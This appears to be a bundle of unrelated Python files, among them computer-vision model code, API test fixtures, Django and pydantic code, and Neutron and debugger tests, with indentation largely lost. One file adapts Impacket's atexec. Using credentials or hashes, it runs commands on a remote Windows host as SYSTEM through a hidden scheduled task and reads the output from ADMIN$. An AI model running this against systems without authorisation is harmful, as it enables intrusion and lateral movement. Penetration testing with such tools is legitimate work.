"""
The number of multi-resolution pyramidal levels of the AAM.
:type: `int`
"""
return len(self.appearance_models)
def instance(self, shape_weights=None, appearance_weights=None, level=-1):
r"""
Generates a novel AAM instance given a set of shape and appearance
weights. If no weights are provided, the mean AAM instance is
returned.
Parameters
-----------
shape_weights : ``(n_weights,)`` `ndarray` or `float` list
Weights of the shape model that will be used to create
a novel shape instance. If ``None``, the mean shape
``(shape_weights = [0, 0, ..., 0])`` is used.
appearance_weights : ``(n_weights,)`` `ndarray` or `float` list
Weights of the appearance model that will be used to create
a novel appearance instance. If ``None``, the mean appearance
``(appearance_weights = [0, 0, ..., 0])`` is used.
level : `int`, optional
The pyramidal level to be used.
Returns
-------
image : :map:`Image`
The novel AAM instance.
"""
sm = self.shape_models[level]
am = self.appearance_models[level]
        # TODO: this bit of logic should be transferred down to PCAModel
if shape_weights is None:
shape_weights = [0]
if appearance_weights is None:
appearance_weights = [0]
n_shape_weights = len(shape_weights)
shape_weights *= sm.eigenvalues[:n_shape_weights] ** 0.5
shape_instance = sm.instance(shape_weights)
n_appearance_weights = len(appearance_weights)
appearance_weights *= am.eigenvalues[:n_appearance_weights] ** 0.5
appearance_instance = am.instance(appearance_weights)
return self._instance(level, shape_instance, appearance_instance)
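    # Illustrative use of `instance` (the `aam` object and weights are hypothetical):
    #   image = aam.instance(shape_weights=[1.0, -0.5], appearance_weights=[2.0])
    # The weights are expressed in units of standard deviation; they are scaled by
    # the square root of the corresponding eigenvalues before building the instance.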
def random_instance(self, level=-1):
r"""
Generates a novel random instance of the AAM.
Parameters
-----------
level : `int`, optional
The pyramidal level to be used.
Returns
-------
image : :map:`Image`
The novel AAM instance.
"""
sm = self.shape_models[level]
am = self.appearance_models[level]
        # TODO: this bit of logic should be transferred down to PCAModel
shape_weights = (np.random.randn(sm.n_active_components) *
sm.eigenvalues[:sm.n_active_components]**0.5)
shape_instance = sm.instance(shape_weights)
appearance_weights = (np.random.randn(am.n_active_components) *
am.eigenvalues[:am.n_active_components]**0.5)
appearance_instance = am.instance(appearance_weights)
return self._instance(level, shape_instance, appearance_instance)
def _instance(self, level, shape_instance, appearance_instance):
template = self.appearance_models[level].mean()
landmarks = template.landmarks['source'].lms
reference_frame = self._build_reference_frame(
shape_instance, landmarks)
transform = self.transform(
reference_frame.landmarks['source'].lms, landmarks)
return appearance_instance.as_unmasked(copy=False).warp_to_mask(
reference_frame.mask, transform, warp_landmarks=True)
def _build_reference_frame(self, reference_shape, landmarks):
if type(landmarks) == TriMesh:
trilist = landmarks.trilist
else:
trilist = None
return build_reference_frame(
reference_shape, trilist=trilist)
@property
def _str_title(self):
r"""
Returns a string containing name of the model.
:type: `string`
"""
return 'Active Appearance Model'
def view_shape_models_widget(self, n_parameters=5, mode='multiple',
parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes the shape models of the AAM object using the
`menpo.visualize.widgets.visualize_shape_model` widget.
Parameters
-----------
n_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the parameters
sliders. If `int`, then the number of sliders per level is the
minimum between `n_parameters` and the number of active components
per level. If `list` of `int`, then a number of sliders is defined
per level. If ``None``, all the active components per level will
have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_shape_model
visualize_shape_model(
self.shape_models, n_parameters=n_parameters,
parameters_bounds=parameters_bounds, figure_size=figure_size,
mode=mode, style=style)
def view_appearance_models_widget(self, n_parameters=5, mode='multiple',
parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes the appearance models of the AAM object using the
`menpo.visualize.widgets.visualize_appearance_model` widget.
Parameters
-----------
n_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the parameters
sliders. If `int`, then the number of sliders per level is the
minimum between `n_parameters` and the number of active components
per level. If `list` of `int`, then a number of sliders is defined
per level. If ``None``, all the active components per level will
have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_appearance_model
visualize_appearance_model(
self.appearance_models, n_parameters=n_parameters,
parameters_bounds=parameters_bounds, figure_size=figure_size,
mode=mode, style=style)
def view_aam_widget(self, n_shape_parameters=5, n_appearance_parameters=5,
mode='multiple', parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes both the shape and appearance models of the AAM object using
the `menpo.visualize.widgets.visualize_aam` widget.
Parameters
-----------
n_shape_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the shape
parameters sliders. If `int`, then the number of sliders per level
is the minimum between `n_parameters` and the number of active
components per level. If `list` of `int`, then a number of sliders
is defined per level. If ``None``, all the active components per
level will have a slider.
n_appearance_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the appearance
parameters sliders. If `int`, then the number of sliders per level
is the minimum between `n_parameters` and the number of active
components per level. If `list` of `int`, then a number of sliders
is defined per level. If ``None``, all the active components per
level will have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_aam
visualize_aam(self, n_shape_parameters=n_shape_parameters,
n_appearance_parameters=n_appearance_parameters,
parameters_bounds=parameters_bounds,
figure_size=figure_size, mode=mode, style=style)
def __str__(self):
out = "{}\n - {} training images.\n".format(self._str_title,
self.n_training_images)
# small strings about number of channels, channels string and downscale
n_channels = []
down_str = []
for j in range(self.n_levels):
n_channels.append(
self.appearance_models[j].template_instance.n_channels)
if j == self.n_levels - 1:
down_str.append('(no downscale)')
else:
down_str.append('(downscale by {})'.format(
self.downscale**(self.n_levels - j - 1)))
# string about features and channels
if self.pyramid_on_features:
feat_str = "- Feature is {} with ".format(
name_of_callable(self.features))
if n_channels[0] == 1:
ch_str = ["channel"]
else:
ch_str = ["channels"]
else:
feat_str = []
ch_str = []
for j in range(self.n_levels):
feat_str.append("- Feature is {} with ".format(
name_of_callable(self.features[j])))
if n_channels[j] == 1:
ch_str.append("channel")
else:
ch_str.append("channels")
out = "{} - {} Warp.\n".format(out, name_of_callable(self.transform))
if self.n_levels > 1:
if self.scaled_shape_models:
out = "{} - Gaussian pyramid with {} levels and downscale " \
"factor of {}.\n - Each level has a scaled shape " \
"model (reference frame).\n".format(out, self.n_levels,
self.downscale)
else:
out = "{} - Gaussian pyramid with {} levels and downscale " \
"factor of {}:\n - Shape models (reference frames) " \
"are not scaled.\n".format(out, self.n_levels,
self.downscale)
if self.pyramid_on_features:
out = "{} - Pyramid was applied on feature space.\n " \
"{}{} {} per image.\n".format(out, feat_str,
n_channels[0], ch_str[0])
if not self.scaled_shape_models:
out = "{} - Reference frames of length {} " \
"({} x {}C, {} x {}C)\n".format(
out,
self.appearance_models[0].n_features,
self.appearance_models[0].template_instance.n_true_pixels(),
n_channels[0],
self.appearance_models[0].template_instance._str_shape,
n_channels[0])
else:
out = "{} - Features were extracted at each pyramid " \
"level.\n".format(out)
for i in range(self.n_levels - 1, -1, -1):
out = "{} - Level {} {}: \n".format(out, self.n_levels - i,
down_str[i])
if not self.pyramid_on_features:
out = "{} {}{} {} per image.\n".format(
out, feat_str[i], n_channels[i], ch_str[i])
if (self.scaled_shape_models or
(not self.pyramid_on_features)):
out = "{} - Reference frame of length {} " \
"({} x {}C, {} x {}C)\n".format(
out, self.appearance_models[i].n_features,
self.appearance_models[i].template_instance.n_true_pixels(),
n_channels[i],
self.appearance_models[i].template_instance._str_shape,
n_channels[i])
out = "{0} - {1} shape components ({2:.2f}% of " \
"variance)\n - {3} appearance components " \
"({4:.2f}% of variance)\n".format(
out, self.shape_models[i].n_components,
self.shape_models[i].variance_ratio() * 100,
self.appearance_models[i].n_components,
self.appearance_models[i].variance_ratio() * 100)
else:
if self.pyramid_on_features:
feat_str = [feat_str]
out = "{0} - No pyramid used:\n {1}{2} {3} per image.\n" \
" - Reference frame of length {4} ({5} x {6}C, " \
"{7} x {8}C)\n - {9} shape components ({10:.2f}% of " \
"variance)\n - {11} appearance components ({12:.2f}% of " \
"variance)\n".format(
out, feat_str[0], n_channels[0], ch_str[0],
self.appearance_models[0].n_features,
self.appearance_models[0].template_instance.n_true_pixels(),
n_channels[0],
self.appearance_models[0].template_instance._str_shape,
n_channels[0], self.shape_models[0].n_components,
self.shape_models[0].variance_ratio() * 100,
self.appearance_models[0].n_components,
self.appearance_models[0].variance_ratio() * 100)
return out
class PatchBasedAAM(AAM):
r"""
Patch Based Active Appearance Model class.
Parameters
-----------
shape_models : :map:`PCAModel` list
A list containing the shape models of the AAM.
appearance_models : :map:`PCAModel` list
A list containing the appearance models of the AAM.
n_training_images : `int`
The number of training images used to build the AAM.
patch_shape : tuple of `int`
The shape of the patches used to build the Patch Based AAM.
transform : :map:`PureAlignmentTransform`
The transform used to warp the images from which the AAM was
constructed.
features : `callable` or ``[callable]``, optional
If list of length ``n_levels``, feature extraction is performed at
each level after downscaling of the image.
The first element of the list specifies the features to be extracted at
the lowest pyramidal level and so on.
If ``callable`` the specified feature will be applied to the original
image and pyramid generation will be performed on top of the feature
image. Also see the `pyramid_on_features` property.
Note that from our experience, this approach of extracting features
once and then creating a pyramid on top tends to lead to better
performing AAMs.
reference_shape : :map:`PointCloud`
The reference shape that was used to resize all training images to a
consistent object size.
downscale : `float`
The downscale factor that was used to create the different pyramidal
levels.
scaled_shape_models : `boolean`, optional
If ``True``, the reference frames are the mean shapes of each pyramid
level, so the shape models are scaled.
If ``False``, the reference frames of all levels are the mean shape of
the highest level, so the shape models are not scaled; they have the
same size.
Note that from our experience, if ``scaled_shape_models`` is ``False``,
AAMs tend to have slightly better performance.
"""
def __init__(self, shape_models, appearance_models, n_training_images,
patch_shape, transform, features, reference_shape,
downscale, scaled_shape_models):
super(PatchBasedAAM, self).__init__(
shape_models, appearance_models, n_training_images, transform,
features, reference_shape, downscale, scaled_shape_models)
self.patch_shape = patch_shape
def _build_reference_frame(self, reference_shape, landmarks):
return build_patch_reference_frame(
reference_shape, patch_shape=self.patch_shape)
@property
def _str_title(self):
r"""
Returns a string containing name of the model.
:type: `string`
"""
return 'Patch-Based Active Appearance Model'
def __str__(self):
out = super(PatchBasedAAM, self).__str__()
out_splitted = out.splitlines()
out_splitted[0] = self._str_title
out_splitted.insert(5, " - Patch size is {}W x {}H.".format(
self.patch_shape[1], self.patch_shape[0]))
return '\n'.join(out_splitted)
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
# -*- Mode: python -*-
from __future__ import division
from __future__ import print_function
import random
import string
import sys
import time
from lib.logger import logger
try:
from impacket.dcerpc.v5 import tsch, transport
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
except ImportError:
    sys.stderr.write('atexec: Impacket import error\n')
    sys.stderr.write('atexec: Impacket by SecureAuth Corporation is required for this tool to work. Please download '
                     'it using:\npip: pip install -r requirements.txt\nOr through your package manager'
                     ':\npython-impacket.\n')
sys.exit(255)
###############################################################
# Code borrowed and adapted from Impacket's atexec.py example #
###############################################################
class TSCH_EXEC:
def __init__(self, addr, username='', password='', domain='', lmhash='', nthash='', aesKey=None, doKerberos=False,
kdcHost=None, command=None):
self.__addr = addr
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__command = command
def play(self):
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % self.__addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
try:
self.doStuff(rpctransport)
except Exception as e:
logger.error(e)
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
logger.info('When STATUS_OBJECT_NAME_NOT_FOUND is received, try running again. It might work')
def doStuff(self, rpctransport):
def output_callback(data):
print(data.decode('utf-8'))
dce = rpctransport.get_dce_rpc()
dce.set_credentials(*rpctransport.get_credentials())
if self.__doKerberos is True:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
# dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
tmpFileName = tmpName + '.tmp'
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/C %s > %%windir%%\\Temp\\%s 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""" % (self.__command, tmpFileName)
taskCreated = False
try:
logger.info('Creating task \\%s' % tmpName)
tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
taskCreated = True
logger.info('Running task \\%s' % tmpName)
tsch.hSchRpcRun(dce, '\\%s' % tmpName)
done = False
while not done:
logger.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
time.sleep(2)
logger.info('Deleting task \\%s' % tmpName)
tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
taskCreated = False
except tsch.DCERPCSessionError as e:
logger.error(e)
e.get_packet().dump()
finally:
if taskCreated is True:
tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
smbConnection = rpctransport.get_smb_connection()
waitOnce = True
while True:
try:
logger.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName)
smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
break
except Exception as e:
if str(e).find('SHARING') > 0:
time.sleep(3)
elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if waitOnce is True:
# We're giving it the chance to flush the file before giving up
time.sleep(3)
waitOnce = False
else:
raise
else:
raise
logger.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName)
smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
dce.disconnect()
|
'''
Created on May 13, 2019
@author: KJNETHER
trying to set up the fixtures so that they:
- test for 'test' data
- remove 'test' data if it already exists
- re-create test data
'''
import json
import logging
import os.path
import pytest
# pylint: disable=redefined-outer-name
from .config_fixture import test_package_name
from .config_fixture import test_user
from bcdc_apitests.helpers.file_utils import FileUtils
LOGGER = logging.getLogger(__name__)
# @pytest.fixture
# def populate_bcdc_dataset(org_create_if_not_exists_fixture, get_cached_package_path,
# test_package_name, test_user):
# '''
# :param org_create_if_not_exists_fixture: creates the test org if it doesn't
# already exist.
# :param test_data_dir: the data directory fixture, provides the directory
# where data is located
# :param test_package_name: the name of the test package
#
# assumption is that the 'data_label_fixture' is the name of a method in
# .helpers.bcdc_dynamic_data_population.DataPopulation. That method
# is going to get called and the returning data is what will get returned
#
# #TODO: 9-26-2019 in the middle of implementing what is described above.
#
# '''
#
#
#
#
# org_id = org_create_if_not_exists_fixture['id']
# LOGGER.debug("test_package_name: %s", test_package_name)
# LOGGER.debug("test user: %s", test_user)
# json_file = os.path.join(test_data_dir, data_label_fixture[0])
# with open(json_file, 'r') as json_file_hand:
# datastore = json.load(json_file_hand)
# datastore['name'] = test_package_name
# datastore['title'] = '{0} {1}'.format(datastore['title'], test_user)
# datastore['org'] = org_id
# datastore['owner_org'] = org_id
# datastore['sub_org'] = org_id
#
# # for now removing any group references. Should do group testing later
# # created a ticket to keep track of that issue DDM-738.
# if 'groups' in datastore:
# del datastore['groups']
# return datastore
@pytest.fixture
def resource_data(package_create_if_not_exists,
test_resource_name):
'''
:param test_data_dir: The directory where the data files are
expected to be
:param test_resource_name: the name of the resource that should
be used for this test
'''
test_data_dir = FileUtils().get_test_data_dir()
logging.debug("test_resource_name: %s", test_resource_name)
json_file = os.path.join(test_data_dir, 'resource.json')
with open(json_file, 'r') as json_file_hand:
resource = json.load(json_file_hand)
resource['name'] = test_resource_name
resource['package_id'] = package_create_if_not_exists['id']
return resource
@pytest.fixture
def test_pkg_data_core_only(populate_bcdc_dataset):
'''
:param populate_bcdc_dataset: Valid package data
Method will remove all but the core attributes required as described in
the ckan docs.
(https://docs.ckan.org/en/2.8/api/#module-ckan.logic.action.create)
core attributes:
- name (string)
- title (string)
- private (bool)
- owner_org (configurable as optional, assuming its not)
'''
logging.debug("test_package_name: %s", populate_bcdc_dataset)
core_attribs = ['name', 'title', 'private', 'owner_org']
core_atribs_only_pkg = {}
for key in populate_bcdc_dataset.keys():
if key in core_attribs:
core_atribs_only_pkg[key] = populate_bcdc_dataset[key]
return core_atribs_only_pkg
@pytest.fixture
def test_pkg_data_updated(populate_bcdc_dataset):
'''
:param populate_bcdc_dataset: package data structure that can be used to load a new
package
:return: a ckan package data structure that can be loaded to ckan for testing
'''
logging.debug("test_package_name: %s", test_package_name)
populate_bcdc_dataset['title'] = 'test package update'
return populate_bcdc_dataset
@pytest.fixture
def test_pkg_data_prep(populate_bcdc_dataset, test_package_state, test_package_visibility):
'''
:param populate_bcdc_dataset: package data structure that can be used to load a new
package
'''
logging.debug("test_package_name: %s", test_package_name)
populate_bcdc_dataset['edc_state'] = test_package_state
populate_bcdc_dataset['metadata_visibility'] = test_package_visibility
return populate_bcdc_dataset
@pytest.fixture
def test_org_data(test_organization):
'''
:param test_data_dir: directory where test data is expected
:param test_organization: The name to be substituted in for the test organization name
:return: an organization data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'ownerOrg.json')
with open(json_file, 'r') as json_file_hand:
org_data = json.load(json_file_hand)
org_data['name'] = test_organization
return org_data
@pytest.fixture
def test_group_data(test_group):
'''
:param test_data_dir: directory where test data is expected
    :param test_group: The name to be substituted in for the test group name
    :return: a group data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'group.json')
with open(json_file, 'r') as json_file_hand:
group_data = json.load(json_file_hand)
group_data['name'] = test_group
return group_data
@pytest.fixture(scope='session')
def session_test_org_data(test_session_organization):
'''
:return: an organization data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
json_file = os.path.join(test_data_dir, 'ownerOrg.json')
LOGGER.debug("json file path: %s", json_file)
with open(json_file, 'r') as json_file_hand:
org_data = json.load(json_file_hand)
org_data['name'] = test_session_organization
return org_data
@pytest.fixture(scope='session')
def session_test_group_data(test_session_group):
'''
    :return: a group data structure that can be used for testing
'''
test_data_dir = FileUtils().get_test_data_dir()
    json_file = os.path.join(test_data_dir, 'group.json')
LOGGER.debug("json file path: %s", json_file)
with open(json_file, 'r') as json_file_hand:
group_data = json.load(json_file_hand)
group_data['name'] = test_session_group
return group_data
|
#!/usr/bin/env python
from Bio import AlignIO
import sys
#This script takes a sequential phylip alignment and converts it to a
#FASTA alignment
# check for correct arguments
if len(sys.argv) != 3:
print("Usage: PhylipSequentialToFasta.py <inputfile> <outputfile>")
sys.exit(1)
input_name = sys.argv[1]
output_name = sys.argv[2]
with open(input_name) as input_file, open(output_name, 'w') as output_file:
    alignment = AlignIO.read(input_file, 'phylip-sequential')
    AlignIO.write(alignment, output_file, 'fasta')
|
from django.contrib.auth.models import User
from guardian.shortcuts import assign_perm
from permissions.services import APIPermissionClassFactory
from post.models import Post
from post.serializers import PostSerializer
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from versus.views import get_element_random, pick_post, getComments
from versus.models import Versus
from follow.models import Follow
from like.models import Like
from versus.serializers import VersusSerializer
def evaluate(user, obj, request):
return user.id == obj.user.id
class PostViewSet(viewsets.ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
permission_classes = (
APIPermissionClassFactory(
name='PostPermission',
permission_configuration={
'base': {
'create': True,
'list': True,
},
'instance': {
'retrieve': True,
'destroy': evaluate,
'update': evaluate,
'partial_update': evaluate,
}
}
),
)
def perform_create(self, serializer):
    post = serializer.save()
    # Position the new post at the end of its topic (1-based order,
    # counting the post that was just saved).
    post.order = Post.objects.filter(topic=post.topic).count()
    post.save()
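# Hypothetical URL wiring sketch (the DRF router below normally lives in a
# urls module; the route prefix is an assumption, not part of this file):
#
#     from rest_framework.routers import DefaultRouter
#     router = DefaultRouter()
#     router.register(r'posts', PostViewSet, basename='post')
#     urlpatterns = router.urls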
|
from dataclasses import dataclass
from typing import List
from pydantic import BaseModel
class DeckIn(BaseModel):
name: str
class DeckOut(BaseModel):
id: int # From database
name: str # From database
notes_total: int # Calculated
cards_total: int # Calculated
time_created: int # From database
count_reviews_due: int # Calculated
count_new_cards: int # Calculated
class NoteIn(BaseModel):
deck_id: int
text_front: str
text_back: str
class NoteOut(BaseModel):
id: int # From database
deck_id: int # From database
text_front: str # From database
text_back: str # From database
audio_front: str # From database
audio_back: str # From database
image_front: str # From database
image_back: str # From database
time_created: int # From database
# cards_total: int # Calculated
# TODO remove question and answer; they should be stored only on Note.
# E.g. if Note content is edited, every derived card would also have to be edited under the current setup.
@dataclass
class CardIn:
note_id: int
direction: str
# TODO remove all below
deck_id: int
question: str
answer: str
class CardOut(BaseModel):
id: int # From database
deck_id: int # Calculated
note_id: int # From database
direction: str # From database
question: str # From database
answer: str # From database
status: str # From database
time_created: int # From database
time_latest_review: int # Calculated
current_review_interval: int # From database
dispersal_groups: List[int] = [] # From database
grade: str # From database
class ReviewOut(BaseModel):
id: int # From database
card: CardOut # Calculated
time_created: int # From database
time_completed: int # From database
review_status: str # From database
correct: int # From database
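# Minimal usage sketch (not part of the original schema module): pydantic
# validates and coerces these fields on construction; the literal values are
# invented for illustration.
if __name__ == "__main__":
    deck = DeckIn(name="Spanish vocabulary")
    note = NoteIn(deck_id=1, text_front="hola", text_back="hello")
    print(deck, note)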
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
from neutron_lib import context
from neutron_lib import exceptions as exc
from oslo_log import log as logging
from neutron.common import constants as n_const
from neutron.common import exceptions as n_exc
from neutron.db import api as db
from neutron.db.models.plugins.ml2 import flatallocation
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.wrs.drivers import type_managed_flat
from neutron.tests.unit.plugins.wrs import test_extension_pnet as test_pnet
from neutron.tests.unit.plugins.wrs import test_wrs_plugin
LOG = logging.getLogger(__name__)
FLAT_PNET1 = {'name': 'flat-pnet0',
'type': n_const.PROVIDERNET_FLAT,
'description': 'flat test provider network'}
class ManagedFlatTypeDriverTestCase(test_pnet.ProvidernetTestCaseMixin,
test_wrs_plugin.WrsMl2PluginV2TestCase):
def setUp(self):
super(ManagedFlatTypeDriverTestCase, self).setUp()
self.context = context.get_admin_context()
self.driver = type_managed_flat.ManagedFlatTypeDriver()
self.session = db.get_session()
self._pnet1 = FLAT_PNET1
def tearDown(self):
super(ManagedFlatTypeDriverTestCase, self).tearDown()
def _get_allocation(self, context, segment):
session = context.session
return session.query(flatallocation.FlatAllocation).filter_by(
physical_network=segment[api.PHYSICAL_NETWORK]).first()
def test_validate_provider_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
self.driver.validate_provider_segment(segment, self.context)
def test_validate_provider_segment_with_missing_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_validate_provider_segment_with_unknown_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'unknown'}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_validate_provider_segment_with_unallowed_segmentation_id(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: self._pnet1['name'],
api.SEGMENTATION_ID: 1234}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment, self.context)
def test_reserve_provider_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
alloc = self._get_allocation(self.context, observed)
self.assertEqual(segment[api.PHYSICAL_NETWORK],
alloc.physical_network)
self.driver.release_segment(self.context, observed)
def test_release_segment(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
alloc = self._get_allocation(self.context, segment)
self.assertIsNotNone(alloc)
self.driver.release_segment(self.context, observed)
alloc = self._get_allocation(self.context, segment)
self.assertIsNone(alloc)
def test_reserve_provider_segment_already_reserved(self):
with self.pnet(self._pnet1) as pnet:
pnet_data = pnet['providernet']
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: pnet_data['name']}
observed = self.driver.reserve_provider_segment(
self.context, segment, tenant_id=self._tenant_id)
self.assertRaises(n_exc.FlatNetworkInUse,
self.driver.reserve_provider_segment,
self.context, segment, tenant_id=self._tenant_id)
self.driver.release_segment(self.context, observed)
|
import sys
from _pydevd_bundle.pydevd_constants import IS_PY38_OR_GREATER
import pytest
SOME_LST = ["foo", "bar"]
BAR = "bar"
FOO = "foo"
global_frame = sys._getframe()
def obtain_frame():
yield sys._getframe()
@pytest.fixture
def disable_critical_log():
# We want to hide the logging related to _evaluate_with_timeouts not receiving the py_db.
from _pydev_bundle.pydev_log import log_context
import io
stream = io.StringIO()
with log_context(0, stream):
yield
def test_evaluate_expression_basic(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
evaluate_expression(None, frame, 'some_var = 1', is_exec=True)
assert frame.f_locals['some_var'] == 1
check(next(iter(obtain_frame())))
assert 'some_var' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'some_var' in sys._getframe().f_globals
del sys._getframe().f_globals['some_var']
assert 'some_var' not in sys._getframe().f_globals
def test_evaluate_expression_1(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''
container = ["abc","efg"]
results = []
for s in container:
result = [s[i] for i in range(3)]
results.append(result)
'''
evaluate_expression(None, frame, eval_txt, is_exec=True)
assert frame.f_locals['results'] == [['a', 'b', 'c'], ['e', 'f', 'g']]
assert frame.f_locals['s'] == "efg"
check(next(iter(obtain_frame())))
for varname in ['container', 'results', 's']:
assert varname not in sys._getframe().f_globals
check(global_frame)
